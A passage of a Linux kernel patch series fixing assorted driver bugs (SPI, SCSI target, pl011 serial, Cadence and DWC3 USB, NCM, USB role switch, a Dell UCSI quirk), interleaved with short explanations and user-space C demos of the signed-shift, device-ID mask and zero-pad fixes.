+@@ -508,11 +513,6 @@ static int scpsys_add_subdomain(struct scpsys *scpsys, struct device_node *paren
+ 			dev_dbg(scpsys->dev, "%s add subdomain: %s\n", parent_pd->name,
+ 				child_pd->name);
+ 		}
+-
+-		/* recursive call to add all subdomains */
+-		ret = scpsys_add_subdomain(scpsys, child);
+-		if (ret)
+-			goto err_put_node;
+ 	}
+ 
+ 	return 0;
+@@ -526,9 +526,6 @@ static void scpsys_remove_one_domain(struct scpsys_domain *pd)
+ {
+ 	int ret;
+ 
+-	if (scpsys_domain_is_on(pd))
+-		scpsys_power_off(&pd->genpd);
+-
+ 	/*
+ 	 * We're in the error cleanup already, so we only complain,
+ 	 * but won't emit another error on top of the original one.
+@@ -538,6 +535,8 @@ static void scpsys_remove_one_domain(struct scpsys_domain *pd)
+ 		dev_err(pd->scpsys->dev,
+ 			"failed to remove domain '%s' : %d - state may be inconsistent\n",
+ 			pd->genpd.name, ret);
++	if (scpsys_domain_is_on(pd))
++		scpsys_power_off(&pd->genpd);
+ 
+ 	clk_bulk_put(pd->num_clks, pd->clks);
+ 	clk_bulk_put(pd->num_subsys_clks, pd->subsys_clks);
+diff --git a/drivers/soc/renesas/r8a77980-sysc.c b/drivers/soc/renesas/r8a77980-sysc.c
+index 39ca84a67daad..621e411fc9991 100644
+--- a/drivers/soc/renesas/r8a77980-sysc.c
++++ b/drivers/soc/renesas/r8a77980-sysc.c
+@@ -25,7 +25,8 @@ static const struct rcar_sysc_area r8a77980_areas[] __initconst = {
+ 	  PD_CPU_NOCR },
+ 	{ "ca53-cpu3",	0x200, 3, R8A77980_PD_CA53_CPU3, R8A77980_PD_CA53_SCU,
+ 	  PD_CPU_NOCR },
+-	{ "cr7",	0x240, 0, R8A77980_PD_CR7,	R8A77980_PD_ALWAYS_ON },
++	{ "cr7",	0x240, 0, R8A77980_PD_CR7,	R8A77980_PD_ALWAYS_ON,
++	  PD_CPU_NOCR },
+ 	{ "a3ir",	0x180, 0, R8A77980_PD_A3IR,	R8A77980_PD_ALWAYS_ON },
+ 	{ "a2ir0",	0x400, 0, R8A77980_PD_A2IR0,	R8A77980_PD_A3IR },
+ 	{ "a2ir1",	0x400, 1, R8A77980_PD_A2IR1,	R8A77980_PD_A3IR },
+diff --git a/drivers/spi/spi-hisi-sfc-v3xx.c b/drivers/spi/spi-hisi-sfc-v3xx.c
+index d3a23b1c2a4c5..61bf00dfe9c33 100644
+--- a/drivers/spi/spi-hisi-sfc-v3xx.c
++++ b/drivers/spi/spi-hisi-sfc-v3xx.c
+@@ -377,6 +377,11 @@ static const struct spi_controller_mem_ops hisi_sfc_v3xx_mem_ops = {
+ static irqreturn_t hisi_sfc_v3xx_isr(int irq, void *data)
+ {
+ 	struct hisi_sfc_v3xx_host *host = data;
++	u32 reg;
++
++	reg = readl(host->regbase + HISI_SFC_V3XX_INT_STAT);
++	if (!reg)
++		return IRQ_NONE;
+ 
+ 	hisi_sfc_v3xx_disable_int(host);
+ 
+diff --git a/drivers/spi/spi-sh-msiof.c b/drivers/spi/spi-sh-msiof.c
+index 51ceaa4857249..ec3a4939ee984 100644
+--- a/drivers/spi/spi-sh-msiof.c
++++ b/drivers/spi/spi-sh-msiof.c
+@@ -137,14 +137,14 @@ struct sh_msiof_spi_priv {
+ 
+ /* SIFCTR */
+ #define SIFCTR_TFWM_MASK	GENMASK(31, 29)	/* Transmit FIFO Watermark */
+-#define SIFCTR_TFWM_64		(0 << 29)	/*  Transfer Request when 64 empty stages */
+-#define SIFCTR_TFWM_32		(1 << 29)	/*  Transfer Request when 32 empty stages */
+-#define SIFCTR_TFWM_24		(2 << 29)	/*  Transfer Request when 24 empty stages */
+-#define SIFCTR_TFWM_16		(3 << 29)	/*  Transfer Request when 16 empty stages */
+-#define SIFCTR_TFWM_12		(4 << 29)	/*  Transfer Request when 12 empty stages */
+-#define SIFCTR_TFWM_8		(5 << 29)	/*  Transfer Request when 8 empty stages */
+-#define SIFCTR_TFWM_4		(6 << 29)	/*  Transfer Request when 4 empty stages */
+-#define SIFCTR_TFWM_1		(7 << 29)	/*  Transfer Request when 1 empty stage */
++#define SIFCTR_TFWM_64		(0UL << 29)	/*  Transfer Request when 64 empty stages */
++#define SIFCTR_TFWM_32		(1UL << 29)	/*  Transfer Request when 32 empty stages */
++#define SIFCTR_TFWM_24		(2UL << 29)	/*  Transfer Request when 24 empty stages */
++#define SIFCTR_TFWM_16		(3UL << 29)	/*  Transfer Request when 16 empty stages */
++#define SIFCTR_TFWM_12		(4UL << 29)	/*  Transfer Request when 12 empty stages */
++#define SIFCTR_TFWM_8		(5UL << 29)	/*  Transfer Request when 8 empty stages */
++#define SIFCTR_TFWM_4		(6UL << 29)	/*  Transfer Request when 4 empty stages */
++#define SIFCTR_TFWM_1		(7UL << 29)	/*  Transfer Request when 1 empty stage */
+ #define SIFCTR_TFUA_MASK	GENMASK(26, 20) /* Transmit FIFO Usable Area */
+ #define SIFCTR_TFUA_SHIFT	20
+ #define SIFCTR_TFUA(i)		((i) << SIFCTR_TFUA_SHIFT)
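
The UL suffixes above are not cosmetic: 7 << 29 is evaluated as a signed
32-bit int, which overflows (formally undefined behaviour) and, with the
result most compilers produce, sign-extends once the constant meets a wider
unsigned type. A small demonstration of that failure mode:

#include <stdio.h>

#define TFWM_1_BAD  (7 << 29)	/* signed shift: overflows into the sign bit */
#define TFWM_1_GOOD (7UL << 29)	/* unsigned long: well-defined 0xe0000000 */

int main(void)
{
	unsigned long reg;

	/* The negative int converts to 0xffffffffe0000000 on LP64,
	 * setting every bit above bit 31 of the register image. */
	reg = 0;
	reg |= TFWM_1_BAD;
	printf("bad:  %#lx\n", reg);

	reg = 0;
	reg |= TFWM_1_GOOD;
	printf("good: %#lx\n", reg);
	return 0;
}
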
+diff --git a/drivers/target/target_core_device.c b/drivers/target/target_core_device.c
+index 301fe376a1206..13558cbd9b82e 100644
+--- a/drivers/target/target_core_device.c
++++ b/drivers/target/target_core_device.c
+@@ -147,7 +147,6 @@ int transport_lookup_tmr_lun(struct se_cmd *se_cmd)
+ 	struct se_session *se_sess = se_cmd->se_sess;
+ 	struct se_node_acl *nacl = se_sess->se_node_acl;
+ 	struct se_tmr_req *se_tmr = se_cmd->se_tmr_req;
+-	unsigned long flags;
+ 
+ 	rcu_read_lock();
+ 	deve = target_nacl_find_deve(nacl, se_cmd->orig_fe_lun);
+@@ -178,10 +177,6 @@ int transport_lookup_tmr_lun(struct se_cmd *se_cmd)
+ 	se_cmd->se_dev = rcu_dereference_raw(se_lun->lun_se_dev);
+ 	se_tmr->tmr_dev = rcu_dereference_raw(se_lun->lun_se_dev);
+ 
+-	spin_lock_irqsave(&se_tmr->tmr_dev->se_tmr_lock, flags);
+-	list_add_tail(&se_tmr->tmr_list, &se_tmr->tmr_dev->dev_tmr_list);
+-	spin_unlock_irqrestore(&se_tmr->tmr_dev->se_tmr_lock, flags);
+-
+ 	return 0;
+ }
+ EXPORT_SYMBOL(transport_lookup_tmr_lun);
+diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c
+index 69a4c9581e80e..7aec34c090661 100644
+--- a/drivers/target/target_core_pscsi.c
++++ b/drivers/target/target_core_pscsi.c
+@@ -910,12 +910,15 @@ pscsi_map_sg(struct se_cmd *cmd, struct scatterlist *sgl, u32 sgl_nents,
+ 
+ 	return 0;
+ fail:
+-	if (bio)
+-		bio_put(bio);
++	if (bio) {
++		bio_uninit(bio);
++		kfree(bio);
++	}
+ 	while (req->bio) {
+ 		bio = req->bio;
+ 		req->bio = bio->bi_next;
+-		bio_put(bio);
++		bio_uninit(bio);
++		kfree(bio);
+ 	}
+ 	req->biotail = NULL;
+ 	return TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE;
+diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c
+index 0686882bcbda3..fb93d74c5d0b2 100644
+--- a/drivers/target/target_core_transport.c
++++ b/drivers/target/target_core_transport.c
+@@ -3627,6 +3627,10 @@ int transport_generic_handle_tmr(
+ 	unsigned long flags;
+ 	bool aborted = false;
+ 
++	spin_lock_irqsave(&cmd->se_dev->se_tmr_lock, flags);
++	list_add_tail(&cmd->se_tmr_req->tmr_list, &cmd->se_dev->dev_tmr_list);
++	spin_unlock_irqrestore(&cmd->se_dev->se_tmr_lock, flags);
++
+ 	spin_lock_irqsave(&cmd->t_state_lock, flags);
+ 	if (cmd->transport_state & CMD_T_ABORTED) {
+ 		aborted = true;
+diff --git a/drivers/tty/serial/amba-pl011.c b/drivers/tty/serial/amba-pl011.c
+index c74eaf2552c32..2f0f05259778a 100644
+--- a/drivers/tty/serial/amba-pl011.c
++++ b/drivers/tty/serial/amba-pl011.c
+@@ -1345,11 +1345,41 @@ static void pl011_start_tx_pio(struct uart_amba_port *uap)
+ 	}
+ }
+ 
++static void pl011_rs485_tx_start(struct uart_amba_port *uap)
++{
++	struct uart_port *port = &uap->port;
++	u32 cr;
++
++	/* Enable transmitter */
++	cr = pl011_read(uap, REG_CR);
++	cr |= UART011_CR_TXE;
++
++	/* Disable receiver if half-duplex */
++	if (!(port->rs485.flags & SER_RS485_RX_DURING_TX))
++		cr &= ~UART011_CR_RXE;
++
++	if (port->rs485.flags & SER_RS485_RTS_ON_SEND)
++		cr &= ~UART011_CR_RTS;
++	else
++		cr |= UART011_CR_RTS;
++
++	pl011_write(cr, uap, REG_CR);
++
++	if (port->rs485.delay_rts_before_send)
++		mdelay(port->rs485.delay_rts_before_send);
++
++	uap->rs485_tx_started = true;
++}
++
+ static void pl011_start_tx(struct uart_port *port)
+ {
+ 	struct uart_amba_port *uap =
+ 	    container_of(port, struct uart_amba_port, port);
+ 
++	if ((uap->port.rs485.flags & SER_RS485_ENABLED) &&
++	    !uap->rs485_tx_started)
++		pl011_rs485_tx_start(uap);
++
+ 	if (!pl011_dma_tx_start(uap))
+ 		pl011_start_tx_pio(uap);
+ }
+@@ -1431,42 +1461,12 @@ static bool pl011_tx_char(struct uart_amba_port *uap, unsigned char c,
+ 	return true;
+ }
+ 
+-static void pl011_rs485_tx_start(struct uart_amba_port *uap)
+-{
+-	struct uart_port *port = &uap->port;
+-	u32 cr;
+-
+-	/* Enable transmitter */
+-	cr = pl011_read(uap, REG_CR);
+-	cr |= UART011_CR_TXE;
+-
+-	/* Disable receiver if half-duplex */
+-	if (!(port->rs485.flags & SER_RS485_RX_DURING_TX))
+-		cr &= ~UART011_CR_RXE;
+-
+-	if (port->rs485.flags & SER_RS485_RTS_ON_SEND)
+-		cr &= ~UART011_CR_RTS;
+-	else
+-		cr |= UART011_CR_RTS;
+-
+-	pl011_write(cr, uap, REG_CR);
+-
+-	if (port->rs485.delay_rts_before_send)
+-		mdelay(port->rs485.delay_rts_before_send);
+-
+-	uap->rs485_tx_started = true;
+-}
+-
+ /* Returns true if tx interrupts have to be (kept) enabled  */
+ static bool pl011_tx_chars(struct uart_amba_port *uap, bool from_irq)
+ {
+ 	struct circ_buf *xmit = &uap->port.state->xmit;
+ 	int count = uap->fifosize >> 1;
+ 
+-	if ((uap->port.rs485.flags & SER_RS485_ENABLED) &&
+-	    !uap->rs485_tx_started)
+-		pl011_rs485_tx_start(uap);
+-
+ 	if (uap->port.x_char) {
+ 		if (!pl011_tx_char(uap, uap->port.x_char, from_irq))
+ 			return true;
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 9fd4e9ed93b8b..f3c25467e571f 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -6159,7 +6159,6 @@ static void ufshcd_err_handling_prepare(struct ufs_hba *hba)
+ 		ufshcd_hold(hba, false);
+ 		if (!ufshcd_is_clkgating_allowed(hba))
+ 			ufshcd_setup_clocks(hba, true);
+-		ufshcd_release(hba);
+ 		pm_op = hba->is_sys_suspended ? UFS_SYSTEM_PM : UFS_RUNTIME_PM;
+ 		ufshcd_vops_resume(hba, pm_op);
+ 	} else {
+diff --git a/drivers/usb/cdns3/cdns3-gadget.c b/drivers/usb/cdns3/cdns3-gadget.c
+index ccdd525bd7c80..2b8f98f0707e7 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.c
++++ b/drivers/usb/cdns3/cdns3-gadget.c
+@@ -826,7 +826,11 @@ void cdns3_gadget_giveback(struct cdns3_endpoint *priv_ep,
+ 			return;
+ 	}
+ 
+-	if (request->complete) {
++	/*
++	 * The zlp request is appended by the driver, so there is no need to call
++	 * usb_gadget_giveback_request() to notify the gadget composite driver.
++	 */
++	if (request->complete && request->buf != priv_dev->zlp_buf) {
+ 		spin_unlock(&priv_dev->lock);
+ 		usb_gadget_giveback_request(&priv_ep->endpoint,
+ 					    request);
+@@ -2537,11 +2541,11 @@ static int cdns3_gadget_ep_disable(struct usb_ep *ep)
+ 
+ 	while (!list_empty(&priv_ep->wa2_descmiss_req_list)) {
+ 		priv_req = cdns3_next_priv_request(&priv_ep->wa2_descmiss_req_list);
++		list_del_init(&priv_req->list);
+ 
+ 		kfree(priv_req->request.buf);
+ 		cdns3_gadget_ep_free_request(&priv_ep->endpoint,
+ 					     &priv_req->request);
+-		list_del_init(&priv_req->list);
+ 		--priv_ep->wa2_counter;
+ 	}
+ 
+diff --git a/drivers/usb/cdns3/core.c b/drivers/usb/cdns3/core.c
+index 7b20d2d5c262e..7242591b346bc 100644
+--- a/drivers/usb/cdns3/core.c
++++ b/drivers/usb/cdns3/core.c
+@@ -394,7 +394,6 @@ static int cdns_role_set(struct usb_role_switch *sw, enum usb_role role)
+ 	return ret;
+ }
+ 
+-
+ /**
+  * cdns_wakeup_irq - interrupt handler for wakeup events
+  * @irq: irq number for cdns3/cdnsp core device
+diff --git a/drivers/usb/cdns3/drd.c b/drivers/usb/cdns3/drd.c
+index d00ff98dffabf..33ba30f79b337 100644
+--- a/drivers/usb/cdns3/drd.c
++++ b/drivers/usb/cdns3/drd.c
+@@ -156,7 +156,8 @@ bool cdns_is_device(struct cdns *cdns)
+  */
+ static void cdns_otg_disable_irq(struct cdns *cdns)
+ {
+-	writel(0, &cdns->otg_irq_regs->ien);
++	if (cdns->version)
++		writel(0, &cdns->otg_irq_regs->ien);
+ }
+ 
+ /**
+@@ -418,15 +419,20 @@ int cdns_drd_init(struct cdns *cdns)
+ 
+ 		cdns->otg_regs = (void __iomem *)&cdns->otg_v1_regs->cmd;
+ 
+-		if (readl(&cdns->otg_cdnsp_regs->did) == OTG_CDNSP_DID) {
++		state = readl(&cdns->otg_cdnsp_regs->did);
++
++		if (OTG_CDNSP_CHECK_DID(state)) {
+ 			cdns->otg_irq_regs = (struct cdns_otg_irq_regs __iomem *)
+ 					      &cdns->otg_cdnsp_regs->ien;
+ 			cdns->version  = CDNSP_CONTROLLER_V2;
+-		} else {
++		} else if (OTG_CDNS3_CHECK_DID(state)) {
+ 			cdns->otg_irq_regs = (struct cdns_otg_irq_regs __iomem *)
+ 					      &cdns->otg_v1_regs->ien;
+ 			writel(1, &cdns->otg_v1_regs->simulate);
+ 			cdns->version  = CDNS3_CONTROLLER_V1;
++		} else {
++			dev_err(cdns->dev, "unsupported DID=0x%08x\n", state);
++			return -EINVAL;
+ 		}
+ 
+ 		dev_dbg(cdns->dev, "DRD version v1 (ID: %08x, rev: %08x)\n",
+@@ -479,7 +485,6 @@ int cdns_drd_exit(struct cdns *cdns)
+ 	return 0;
+ }
+ 
+-
+ /* Indicate the cdns3 core was power lost before */
+ bool cdns_power_is_lost(struct cdns *cdns)
+ {
+diff --git a/drivers/usb/cdns3/drd.h b/drivers/usb/cdns3/drd.h
+index cbdf94f73ed91..d72370c321d39 100644
+--- a/drivers/usb/cdns3/drd.h
++++ b/drivers/usb/cdns3/drd.h
+@@ -79,7 +79,11 @@ struct cdnsp_otg_regs {
+ 	__le32 susp_timing_ctrl;
+ };
+ 
+-#define OTG_CDNSP_DID	0x0004034E
++/* CDNSP driver supports 0x000403xx Cadence USB controller family. */
++#define OTG_CDNSP_CHECK_DID(did) (((did) & GENMASK(31, 8)) == 0x00040300)
++
++/* CDNS3 driver supports 0x000402xx Cadence USB controller family. */
++#define OTG_CDNS3_CHECK_DID(did) (((did) & GENMASK(31, 8)) == 0x00040200)
+ 
+ /*
+  * Common registers interface for both CDNS3 and CDNSP version of DRD.
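
Masking bits 31:8 of the DID turns the old equality test against a single
device ID into a family check, so every 0x000403xx part probes as CDNSP and
every 0x000402xx part as CDNS3. A user-space sketch, using a simplified
32-bit GENMASK and the old single-ID constant as test input:

#include <stdio.h>
#include <stdint.h>

/* Simplified 32-bit variant of the kernel's GENMASK(). */
#define GENMASK(h, l) (((~0U) << (l)) & (~0U >> (31 - (h))))

#define OTG_CDNSP_CHECK_DID(did) (((did) & GENMASK(31, 8)) == 0x00040300)
#define OTG_CDNS3_CHECK_DID(did) (((did) & GENMASK(31, 8)) == 0x00040200)

int main(void)
{
	uint32_t did = 0x0004034E; /* the ID the old code compared against */

	/* Prints cdnsp=1 cdns3=0: the family match still covers it. */
	printf("cdnsp=%d cdns3=%d\n",
	       OTG_CDNSP_CHECK_DID(did), OTG_CDNS3_CHECK_DID(did));
	return 0;
}
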
+diff --git a/drivers/usb/cdns3/host.c b/drivers/usb/cdns3/host.c
+index 6164fc4c96a49..ceca4d839dfd4 100644
+--- a/drivers/usb/cdns3/host.c
++++ b/drivers/usb/cdns3/host.c
+@@ -18,6 +18,11 @@
+ #include "../host/xhci.h"
+ #include "../host/xhci-plat.h"
+ 
++/*
++ * The XECP_PORT_CAP_REG and XECP_AUX_CTRL_REG1 registers exist only
++ * in the Cadence USB3 dual-role controller, so they can't be used
++ * with the Cadence CDNSP dual-role controller.
++ */
+ #define XECP_PORT_CAP_REG	0x8000
+ #define XECP_AUX_CTRL_REG1	0x8120
+ 
+@@ -57,6 +62,8 @@ static const struct xhci_plat_priv xhci_plat_cdns3_xhci = {
+ 	.resume_quirk = xhci_cdns3_resume_quirk,
+ };
+ 
++static const struct xhci_plat_priv xhci_plat_cdnsp_xhci;
++
+ static int __cdns_host_init(struct cdns *cdns)
+ {
+ 	struct platform_device *xhci;
+@@ -81,8 +88,13 @@ static int __cdns_host_init(struct cdns *cdns)
+ 		goto err1;
+ 	}
+ 
+-	cdns->xhci_plat_data = kmemdup(&xhci_plat_cdns3_xhci,
+-			sizeof(struct xhci_plat_priv), GFP_KERNEL);
++	if (cdns->version < CDNSP_CONTROLLER_V2)
++		cdns->xhci_plat_data = kmemdup(&xhci_plat_cdns3_xhci,
++				sizeof(struct xhci_plat_priv), GFP_KERNEL);
++	else
++		cdns->xhci_plat_data = kmemdup(&xhci_plat_cdnsp_xhci,
++				sizeof(struct xhci_plat_priv), GFP_KERNEL);
++
+ 	if (!cdns->xhci_plat_data) {
+ 		ret = -ENOMEM;
+ 		goto err1;
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 576c21bf77cda..b134110cc2ed5 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2548,6 +2548,11 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	int ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
++	if (!dwc->pullups_connected) {
++		spin_unlock_irqrestore(&dwc->lock, flags);
++		return 0;
++	}
++
+ 	dwc->connected = false;
+ 
+ 	/*
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index bbb6ff6b11aa1..5e78fcc63e4d3 100644
+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -1340,7 +1340,15 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 	     "Parsed NTB with %d frames\n", dgram_counter);
+ 
+ 	to_process -= block_len;
+-	if (to_process != 0) {
++
++	/*
++	 * The Windows NCM driver avoids USB ZLPs by adding a 1-byte
++	 * zero pad as needed.
++	 */
++	if (to_process == 1 &&
++	    (*(unsigned char *)(ntb_ptr + block_len) == 0x00)) {
++		to_process--;
++	} else if (to_process > 0) {
+ 		ntb_ptr = (unsigned char *)(ntb_ptr + block_len);
+ 		goto parse_ntb;
+ 	}
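
The new branch consumes exactly one trailing zero byte instead of treating
it as the start of another (malformed) NTB. A minimal sketch of the tail
handling with a made-up buffer, not the gadget code:

#include <stdio.h>

/* Returns how many bytes remain unparsed after one NTB block. */
static int parse_tail(const unsigned char *ntb_ptr, int to_process,
		      int block_len)
{
	to_process -= block_len;

	/* A single leftover 0x00 is the Windows-style ZLP-avoidance pad. */
	if (to_process == 1 && ntb_ptr[block_len] == 0x00)
		to_process--;

	return to_process; /* > 0 means another NTB really follows */
}

int main(void)
{
	unsigned char ntb[] = { 1, 2, 3, 4, 0x00 };

	/* A 4-byte block plus one zero pad: nothing is left over. */
	printf("%d\n", parse_tail(ntb, sizeof(ntb), 4));
	return 0;
}
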
+diff --git a/drivers/usb/roles/class.c b/drivers/usb/roles/class.c
+index 32e6d19f7011a..a327f8bc57043 100644
+--- a/drivers/usb/roles/class.c
++++ b/drivers/usb/roles/class.c
+@@ -19,7 +19,9 @@ static struct class *role_class;
+ struct usb_role_switch {
+ 	struct device dev;
+ 	struct mutex lock; /* device lock*/
++	struct module *module; /* the module this device depends on */
+ 	enum usb_role role;
++	bool registered;
+ 
+ 	/* From descriptor */
+ 	struct device *usb2_port;
+@@ -46,6 +48,9 @@ int usb_role_switch_set_role(struct usb_role_switch *sw, enum usb_role role)
+ 	if (IS_ERR_OR_NULL(sw))
+ 		return 0;
+ 
++	if (!sw->registered)
++		return -EOPNOTSUPP;
++
+ 	mutex_lock(&sw->lock);
+ 
+ 	ret = sw->set(sw, role);
+@@ -71,7 +76,7 @@ enum usb_role usb_role_switch_get_role(struct usb_role_switch *sw)
+ {
+ 	enum usb_role role;
+ 
+-	if (IS_ERR_OR_NULL(sw))
++	if (IS_ERR_OR_NULL(sw) || !sw->registered)
+ 		return USB_ROLE_NONE;
+ 
+ 	mutex_lock(&sw->lock);
+@@ -133,7 +138,7 @@ struct usb_role_switch *usb_role_switch_get(struct device *dev)
+ 						  usb_role_switch_match);
+ 
+ 	if (!IS_ERR_OR_NULL(sw))
+-		WARN_ON(!try_module_get(sw->dev.parent->driver->owner));
++		WARN_ON(!try_module_get(sw->module));
+ 
+ 	return sw;
+ }
+@@ -155,7 +160,7 @@ struct usb_role_switch *fwnode_usb_role_switch_get(struct fwnode_handle *fwnode)
+ 		sw = fwnode_connection_find_match(fwnode, "usb-role-switch",
+ 						  NULL, usb_role_switch_match);
+ 	if (!IS_ERR_OR_NULL(sw))
+-		WARN_ON(!try_module_get(sw->dev.parent->driver->owner));
++		WARN_ON(!try_module_get(sw->module));
+ 
+ 	return sw;
+ }
+@@ -170,7 +175,7 @@ EXPORT_SYMBOL_GPL(fwnode_usb_role_switch_get);
+ void usb_role_switch_put(struct usb_role_switch *sw)
+ {
+ 	if (!IS_ERR_OR_NULL(sw)) {
+-		module_put(sw->dev.parent->driver->owner);
++		module_put(sw->module);
+ 		put_device(&sw->dev);
+ 	}
+ }
+@@ -187,15 +192,18 @@ struct usb_role_switch *
+ usb_role_switch_find_by_fwnode(const struct fwnode_handle *fwnode)
+ {
+ 	struct device *dev;
++	struct usb_role_switch *sw = NULL;
+ 
+ 	if (!fwnode)
+ 		return NULL;
+ 
+ 	dev = class_find_device_by_fwnode(role_class, fwnode);
+-	if (dev)
+-		WARN_ON(!try_module_get(dev->parent->driver->owner));
++	if (dev) {
++		sw = to_role_switch(dev);
++		WARN_ON(!try_module_get(sw->module));
++	}
+ 
+-	return dev ? to_role_switch(dev) : NULL;
++	return sw;
+ }
+ EXPORT_SYMBOL_GPL(usb_role_switch_find_by_fwnode);
+ 
+@@ -337,6 +345,7 @@ usb_role_switch_register(struct device *parent,
+ 	sw->set = desc->set;
+ 	sw->get = desc->get;
+ 
++	sw->module = parent->driver->owner;
+ 	sw->dev.parent = parent;
+ 	sw->dev.fwnode = desc->fwnode;
+ 	sw->dev.class = role_class;
+@@ -351,6 +360,8 @@ usb_role_switch_register(struct device *parent,
+ 		return ERR_PTR(ret);
+ 	}
+ 
++	sw->registered = true;
++
+ 	/* TODO: Symlinks for the host port and the device controller. */
+ 
+ 	return sw;
+@@ -365,8 +376,10 @@ EXPORT_SYMBOL_GPL(usb_role_switch_register);
+  */
+ void usb_role_switch_unregister(struct usb_role_switch *sw)
+ {
+-	if (!IS_ERR_OR_NULL(sw))
++	if (!IS_ERR_OR_NULL(sw)) {
++		sw->registered = false;
+ 		device_unregister(&sw->dev);
++	}
+ }
+ EXPORT_SYMBOL_GPL(usb_role_switch_unregister);
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index 26171c5d3c61c..48130d636a020 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -25,6 +25,8 @@ struct ucsi_acpi {
+ 	unsigned long flags;
+ 	guid_t guid;
+ 	u64 cmd;
++	bool dell_quirk_probed;
++	bool dell_quirk_active;
+ };
+ 
+ static int ucsi_acpi_dsm(struct ucsi_acpi *ua, int func)
+@@ -126,12 +128,73 @@ static const struct ucsi_operations ucsi_zenbook_ops = {
+ 	.async_write = ucsi_acpi_async_write
+ };
+ 
+-static const struct dmi_system_id zenbook_dmi_id[] = {
++/*
++ * Some Dell laptops expect that an ACK command with the
++ * UCSI_ACK_CONNECTOR_CHANGE bit set is followed by a (separate)
++ * ACK command that only has the UCSI_ACK_COMMAND_COMPLETE bit set.
++ * If this is not done, events are not delivered to OSPM and
++ * subsequent commands will time out.
++ */
++static int
++ucsi_dell_sync_write(struct ucsi *ucsi, unsigned int offset,
++		     const void *val, size_t val_len)
++{
++	struct ucsi_acpi *ua = ucsi_get_drvdata(ucsi);
++	u64 cmd = *(u64 *)val, ack = 0;
++	int ret;
++
++	if (UCSI_COMMAND(cmd) == UCSI_ACK_CC_CI &&
++	    cmd & UCSI_ACK_CONNECTOR_CHANGE)
++		ack = UCSI_ACK_CC_CI | UCSI_ACK_COMMAND_COMPLETE;
++
++	ret = ucsi_acpi_sync_write(ucsi, offset, val, val_len);
++	if (ret != 0)
++		return ret;
++	if (ack == 0)
++		return ret;
++
++	if (!ua->dell_quirk_probed) {
++		ua->dell_quirk_probed = true;
++
++		cmd = UCSI_GET_CAPABILITY;
++		ret = ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &cmd,
++					   sizeof(cmd));
++		if (ret == 0)
++			return ucsi_acpi_sync_write(ucsi, UCSI_CONTROL,
++						    &ack, sizeof(ack));
++		if (ret != -ETIMEDOUT)
++			return ret;
++
++		ua->dell_quirk_active = true;
++		dev_err(ua->dev, "Firmware bug: Additional ACK required after ACKing a connector change.\n");
++		dev_err(ua->dev, "Firmware bug: Enabling workaround\n");
++	}
++
++	if (!ua->dell_quirk_active)
++		return ret;
++
++	return ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &ack, sizeof(ack));
++}
++
++static const struct ucsi_operations ucsi_dell_ops = {
++	.read = ucsi_acpi_read,
++	.sync_write = ucsi_dell_sync_write,
++	.async_write = ucsi_acpi_async_write
++};
++
++static const struct dmi_system_id ucsi_acpi_quirks[] = {
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "ZenBook UX325UA_UM325UA"),
+ 		},
++		.driver_data = (void *)&ucsi_zenbook_ops,
++	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
++		},
++		.driver_data = (void *)&ucsi_dell_ops,
+ 	},
+ 	{ }
+ };
+@@ -160,6 +223,7 @@ static int ucsi_acpi_probe(struct platform_device *pdev)
+ {
+ 	struct acpi_device *adev = ACPI_COMPANION(&pdev->dev);
+ 	const struct ucsi_operations *ops = &ucsi_acpi_ops;
++	const struct dmi_system_id *id;
+ 	struct ucsi_acpi *ua;
+ 	struct resource *res;
+ 	acpi_status status;
+@@ -189,8 +253,9 @@ static int ucsi_acpi_probe(struct platform_device *pdev)
+ 	init_completion(&ua->complete);
+ 	ua->dev = &pdev->dev;
+ 
+-	if (dmi_check_system(zenbook_dmi_id))
+-		ops = &ucsi_zenbook_ops;
++	id = dmi_first_match(ucsi_acpi_quirks);
++	if (id)
++		ops = id->driver_data;
+ 
+ 	ua->ucsi = ucsi_create(&pdev->dev, ops);
+ 	if (IS_ERR(ua->ucsi))
+diff --git a/drivers/vfio/iova_bitmap.c b/drivers/vfio/iova_bitmap.c
+index 0f19d502f351b..dfab5b742191a 100644
+--- a/drivers/vfio/iova_bitmap.c
++++ b/drivers/vfio/iova_bitmap.c
+@@ -99,7 +99,7 @@ struct iova_bitmap {
+ 	struct iova_bitmap_map mapped;
+ 
+ 	/* userspace address of the bitmap */
+-	u64 __user *bitmap;
++	u8 __user *bitmap;
+ 
+ 	/* u64 index that @mapped points to */
+ 	unsigned long mapped_base_index;
+@@ -161,7 +161,7 @@ static int iova_bitmap_get(struct iova_bitmap *bitmap)
+ {
+ 	struct iova_bitmap_map *mapped = &bitmap->mapped;
+ 	unsigned long npages;
+-	u64 __user *addr;
++	u8 __user *addr;
+ 	long ret;
+ 
+ 	/*
+@@ -174,18 +174,19 @@ static int iova_bitmap_get(struct iova_bitmap *bitmap)
+ 			       bitmap->mapped_base_index) *
+ 			       sizeof(*bitmap->bitmap), PAGE_SIZE);
+ 
+-	/*
+-	 * We always cap at max number of 'struct page' a base page can fit.
+-	 * This is, for example, on x86 means 2M of bitmap data max.
+-	 */
